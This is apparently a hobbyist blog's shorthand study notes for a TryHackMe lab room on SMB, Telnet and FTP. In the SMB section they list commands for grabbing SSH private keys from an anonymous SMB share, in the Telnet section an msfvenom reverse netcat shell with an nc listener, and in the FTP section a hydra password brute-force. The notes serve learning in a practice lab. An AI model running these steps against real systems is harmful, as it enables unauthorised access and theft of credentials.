TryHackMe Network Services Room Notes


Table of Contents

Are you going through TryHackMe’s Network Services 1 Room? Need help taking notes? I got you covered. Here are my Network Services 1 room notes from TryHackMe, use them as much as you need!

Disclaimer, this is written in shorthand format, meaning, full sentences and proper grammar are not always used. For writeups, see SMB Part 1, for help with Linux, see Quick Start Guide.

SMB: Understanding, Enumerating, Exploiting

Server Message Block (SMB) Protocol: client/server comms for file/printer/serial ports/others for MS Windows.

  • Type: response-request protocol, transmits multiple messages to est connection.
  • Connections: TCP/IP (NetBIOS, NetBEUI, IPX/SPX).
  • SMB Commands (SMBs): if est connection, share files etc.
  • Support: Samba (open source server) by UNIX.

Free Checklist: Hacker's Learning Path

Offline checklist to track your learning path, become a great hacker and stay on task.

Enumeration: process of gathering info, enum4linux.

  • Install (ubuntu): enum4linux
    1. git clone <github URL>
    2. mv /usr/bin
    3. apt install smbclient
  • Access: smbclient
    1. smbclient -U Anonymous //<ip>/profiles
    2. ls, more "Working...txt"
    3. cd .ssh, ls, mget id_rsa*
    4. chmod 600 id_rsa [email protected]<ip>

Telnet: Understanding, Enumerating, Exploiting

Telnet: app protocol, connects/executes commands, non-secure clear text, replaced by ssh e.g. telnet <ip> <port>.

  • Enumeration: dosen’t ‘jump out’ at us.
    1. sudo nmap -vv -T4 -p- <ip>
    2. nmap -vv -A -p 8012 <ip>
    3. s****** b******
  • CVE (Common Vuln and Exposures): listed public sec flaws, with IDs.
  • Shell: code/program to gain code/command execution.
  • Reverse Shell: target comms back to attack device, target has listening port.
    1. telnet <ip> <port> | CTRL + ] closes telnet.
    2. sudo tcpdump ip proto \\\\icmp -i tun0
    3. .RUN ping <my ip> -c 1
    4. msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R
    5. nc -lvp 4444
    6. .RUN <payload>

FTP: Understanding, Enumerating, Exploiting

File Transfer Protocol, allows remote (client/server) files transfers.

  • Two Channels: 1) command/control, transmits commands/replies, 2) data, transfers actual data.
  • Modes:
    • Active: client opens/listens, server actively connects.
    • Passive: server opens/listens, client connects.
  • Enumeration
    1. nmap -vv -T4 -Pn -p- <ip> & nmap -vv -A -p 21 <ip>
    2. ftp <ip>, anonymous, ls, more PUBLIC_NOTICE.txt
  • Exploit: command/data channels unencrypted
    1. hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt.gz -vV <ip> ftp

This is Day 42 of #100DaysOfHacking, subscribe to my newsletter to see the CyberSec journey! If you like, follow the Learning Path for yourself, happy hacking.

About The Author
Mr Ash

Mr Ash

“Learn, create, share, repeat.” • IT teacher, former web designer, learning CyberSec • Road to #100DaysOfHacking on Hackers Learning Path.
Share This Article

Monthly Newsletter

Learn about cyber security, hacking guides & python programming.

Leave A Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More Content

Monthly Newsletter

Learn about cyber security, hacking guides & python programming.

This site uses cookies and other tracking technologies to assist with navigation, monitor site usage and web traffic, assist with our promotional and marketing efforts, and customize and improve our services, as set out in our privacy policy